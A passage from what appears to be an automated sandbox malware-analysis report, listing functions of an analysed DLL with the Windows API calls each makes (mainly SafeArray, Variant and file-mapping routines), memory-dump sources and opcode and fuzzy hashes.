                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
                                                                                          • String ID: void
                                                                                          • API String ID: 1480779885-3531332078
                                                                                          • Opcode ID: b76097ac76d0275a0312e49abcdd4eefad12d798018f6453c574aafa5c3d06fb
                                                                                          • Instruction ID: 26b26d4f76927fe819851e1037ab47edf6ad5c14a37134a39634eba000ef2f97
                                                                                          • Opcode Fuzzy Hash: b76097ac76d0275a0312e49abcdd4eefad12d798018f6453c574aafa5c3d06fb
                                                                                          • Instruction Fuzzy Hash: 9111C2B4904244AFFB25DF68C89DBFC7BB0AB05305F064098D1259F2E1DB70AE46CB48
                                                                                          Function 6D02840E Relevance: 13.8, APIs: 9, Instructions: 332COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6D0284BF
                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D0284D2
                                                                                          • SafeArrayGetElement.OLEAUT32 ref: 6D02850A
                                                                                            • Part of subcall function 6D023A90: SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6D023B71
                                                                                            • Part of subcall function 6D023A90: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D023B83
                                                                                            • Part of subcall function 6D0269C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6D026A08
                                                                                            • Part of subcall function 6D0269C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D026A15
                                                                                            • Part of subcall function 6D0269C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6D026A41
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE63
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE73
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE86
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE99
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEAC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEBF
                                                                                            • Part of subcall function 6D01DFB0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6D01DFF6
                                                                                            • Part of subcall function 6D01DFB0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D01E003
                                                                                            • Part of subcall function 6D01DFB0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6D01E02F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArraySafe$Bound$Destroy$Element
                                                                                          • String ID:
                                                                                          • API String ID: 959723449-0
                                                                                          • Opcode ID: 8dae9c4ee980f497cd8a99c96576af7759d625befbd62088d40d513acb239f08
                                                                                          • Instruction ID: b0296e9f0e773d9e1f416914c0fbdd764fdbb078f71c0c3e952c9d11891c0569
                                                                                          • Opcode Fuzzy Hash: 8dae9c4ee980f497cd8a99c96576af7759d625befbd62088d40d513acb239f08
                                                                                          • Instruction Fuzzy Hash: B0C18674A052059FEF10DF68CC80FADB7B9AF85308F608199E619EB286DB71ED41CB50
                                                                                          Function 6D02C850 Relevance: 13.8, APIs: 9, Instructions: 271COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D02C88F
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D02C895
                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6D02C8A0
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6D02C8D5
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02C8E1
                                                                                          • std::tr1::_Xweak.LIBCPMT ref: 6D02CB1C
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02CB39
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02CB49
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02CB4F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$ArrayClearSafe$Init$CreateDestroyElementVectorXweakstd::tr1::_
                                                                                          • String ID:
                                                                                          • API String ID: 1774866819-0
                                                                                          • Opcode ID: 1a349170bfb8760916a0a173e7fd98828ecd4b80e61e9d0427434b8a4318db0a
                                                                                          • Instruction ID: b580adaa68d2009b7a6d4f2deb08d997b12fe146ad99dd3805847cde250568da
                                                                                          • Opcode Fuzzy Hash: 1a349170bfb8760916a0a173e7fd98828ecd4b80e61e9d0427434b8a4318db0a
                                                                                          • Instruction Fuzzy Hash: 93B13875600649AFDB14DF98CC84EBAB7F9BF8D300F158568E606AB791DA34F841CB60
                                                                                          Function 6D023F10 Relevance: 13.7, APIs: 9, Instructions: 201COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6D023F7B
                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D023F8D
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D023FB7
                                                                                          • SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6D023FD0
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D0240C9
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D024105
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D024123
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D024157
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D024168
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$ArrayClearSafe$Bound$DestroyElementInit
                                                                                          • String ID:
                                                                                          • API String ID: 758290628-0
                                                                                          • Opcode ID: 0cc43784147e7ca1cfd2a225f56c5176f3c2f581f5165addd22c4a137712ea52
                                                                                          • Instruction ID: b0b585e6a2ec01feb6c0735423db9e11e1be9c63af03c6214a4d2a73ea2b1e7b
                                                                                          • Opcode Fuzzy Hash: 0cc43784147e7ca1cfd2a225f56c5176f3c2f581f5165addd22c4a137712ea52
                                                                                          • Instruction Fuzzy Hash: 3D718C76109342AFD700DF68C8C4A6BBBF9BBAD704F104A2CF69587250D730E945CB92
                                                                                          Function 6D00FC30 Relevance: 13.7, APIs: 9, Instructions: 154fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • UnmapViewOfFile.KERNEL32(00000000,?,?,00000000,4E8A916F), ref: 6D00FC98
                                                                                          • CloseHandle.KERNEL32(FFFFFFFF,?,?,00000000,4E8A916F), ref: 6D00FCAD
                                                                                          • CloseHandle.KERNEL32(?,?,?,00000000,4E8A916F), ref: 6D00FCB7
                                                                                          • SetLastError.KERNEL32(00000000,?,?,00000000,4E8A916F), ref: 6D00FCBA
                                                                                          • CreateFileW.KERNEL32(?,-00000001,00000001,00000000,00000003,00000000,00000000,?,?,00000000,4E8A916F), ref: 6D00FD01
                                                                                          • GetFileSizeEx.KERNEL32(00000000,?,?,?,00000000,4E8A916F), ref: 6D00FD14
                                                                                          • GetLastError.KERNEL32(?,?,00000000,4E8A916F), ref: 6D00FD2A
                                                                                          • CreateFileMappingW.KERNEL32(?,00000000,?,00000000,00000000,00000000,?,?,00000000,4E8A916F), ref: 6D00FD6B
                                                                                          • MapViewOfFile.KERNEL32(00000000,?,00000000,00000000,00000000,?,?,00000000,4E8A916F), ref: 6D00FD98
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$CloseCreateErrorHandleLastView$MappingSizeUnmap
                                                                                          • String ID:
                                                                                          • API String ID: 1303881157-0
                                                                                          • Opcode ID: 72f9d2d6979760d9147d07faea9e9b2a3030c298823d5673ebd38e9766c90ab3
                                                                                          • Instruction ID: 9f66abb79388035f2dd333414d3845cdd5f181b464e8ca33ca18df4f2587ab74
                                                                                          • Opcode Fuzzy Hash: 72f9d2d6979760d9147d07faea9e9b2a3030c298823d5673ebd38e9766c90ab3
                                                                                          • Instruction Fuzzy Hash: B051F7B1A04302BBFB008F34C885B6A7BE9AB4D360F158669ED15CF2C5DB74D8019BE5
                                                                                          Function 6D0642B0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 186COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6D0642DD
                                                                                            • Part of subcall function 6D0690D8: std::exception::exception.LIBCMT ref: 6D0690ED
                                                                                            • Part of subcall function 6D0690D8: __CxxThrowException@8.LIBCMT ref: 6D069102
                                                                                            • Part of subcall function 6D0690D8: std::exception::exception.LIBCMT ref: 6D069113
                                                                                          • _memmove.LIBCMT ref: 6D064363
                                                                                          • _memmove.LIBCMT ref: 6D064381
                                                                                          • _memmove.LIBCMT ref: 6D0643E6
                                                                                          • _memmove.LIBCMT ref: 6D064453
                                                                                          • _memmove.LIBCMT ref: 6D064474
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: _memmove$std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                          • String ID: vector<T> too long
                                                                                          • API String ID: 4034224661-3788999226
                                                                                          • Opcode ID: 6c58f694b7bd637bebf2daf8db2b6bb2cabed54eef197afe35d2b839ff7b28f7
                                                                                          • Instruction ID: 46a439b637af146920cb9365e6e2936cae660dc3cc8b78f4e10884e574d3ec4d
                                                                                          • Opcode Fuzzy Hash: 6c58f694b7bd637bebf2daf8db2b6bb2cabed54eef197afe35d2b839ff7b28f7
                                                                                          • Instruction Fuzzy Hash: 5E51A3B17083069FD718CF68DC85A6BB7E9EBD8218F194A2DF946C3344E671E904C7A1
                                                                                          Function 6D034B60 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 143COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                          • String ID: invalid string position$string too long
                                                                                          • API String ID: 2168136238-4289949731
                                                                                          • Opcode ID: d95a4007f9308818ddaac26158d15891fdcb0bc1045900fc9ce55aa064a7e002
                                                                                          • Instruction ID: 3fdb9b7c8b64e7530c59406b3289fc5efb78d548b5870596db40941b51f9ebf0
                                                                                          • Opcode Fuzzy Hash: d95a4007f9308818ddaac26158d15891fdcb0bc1045900fc9ce55aa064a7e002
                                                                                          • Instruction Fuzzy Hash: 0241D932314262ABF724CE1CE880F6EF7E9EB9D714B62091EE151CB691C762DC858761
                                                                                          Function 6D01FFEA Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 130COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223B3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223C3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223D6
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223E9
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223FC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02240F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID: RSDi
                                                                                          • API String ID: 4225690600-559181253
                                                                                          • Opcode ID: 2bd0391f5e21538758fc9921b54425b5cd5c035cce26f35e3cfb9162d1124d3c
                                                                                          • Instruction ID: dc3e85e5980422e022235240abe6a177f6c90cf759abcf30b3b052dff5ed3ba0
                                                                                          • Opcode Fuzzy Hash: 2bd0391f5e21538758fc9921b54425b5cd5c035cce26f35e3cfb9162d1124d3c
                                                                                          • Instruction Fuzzy Hash: BF412974A016199FEB10DFA9C980F6EB7FAAF89300F60858AE509DB355DB31E941CF50
                                                                                          Function 6D020815 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223B3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223C3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223D6
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223E9
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223FC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02240F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID: RSUa
                                                                                          • API String ID: 4225690600-2086061799
                                                                                          • Opcode ID: 16a75d97aed0fef88708f5aa9457d792e8cb1a7564698deb7386da263a801229
                                                                                          • Instruction ID: 513711f4efd1bf67bf66858d2ab9db96c704a97b9f2082a17efb753fa5397278
                                                                                          • Opcode Fuzzy Hash: 16a75d97aed0fef88708f5aa9457d792e8cb1a7564698deb7386da263a801229
                                                                                          • Instruction Fuzzy Hash: 70313B70E016199FEB10CFA9CD80B6EB7F9AF89300F608586E558EB251C771DA81CF50
                                                                                          Function 6D020787 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223B3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223C3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223D6
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223E9
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223FC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02240F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID: RSa
                                                                                          • API String ID: 4225690600-3169278968
                                                                                          • Opcode ID: 98dc322c9365b7129cac3559b6f25e14a120a14eef896f4fb8c59f4ff174e993
                                                                                          • Instruction ID: cf66bc53f6f57467b729023e6f62b7a09116631cda2c57f4a56b8492d56d1b52
                                                                                          • Opcode Fuzzy Hash: 98dc322c9365b7129cac3559b6f25e14a120a14eef896f4fb8c59f4ff174e993
                                                                                          • Instruction Fuzzy Hash: 62313C70E116199FDB10DFA9CD80B6EB7F9AF89300F608596E518EB251C771DA41CF50
                                                                                          Function 6D0206F9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223B3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223C3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223D6
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223E9
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223FC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02240F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID: RSqb
                                                                                          • API String ID: 4225690600-347567867
                                                                                          • Opcode ID: dd0db5746f6a265b5dbedada8c8bc31ad62cee56b061d545268d9436674e231f
                                                                                          • Instruction ID: 935c17568d74df049544229a5196efa9e1c6c81a672705ff1588b4f26ff6d1e2
                                                                                          • Opcode Fuzzy Hash: dd0db5746f6a265b5dbedada8c8bc31ad62cee56b061d545268d9436674e231f
                                                                                          • Instruction Fuzzy Hash: 32315C70E016099FDB10CFA9CD80B6EB7F9AF89300F608586E518EB251DB75DA81CF50
                                                                                          Function 6D02012D Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223B3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223C3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223D6
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223E9
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223FC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02240F
                                                                                          Strings
                                                                                          Memory Dump Source
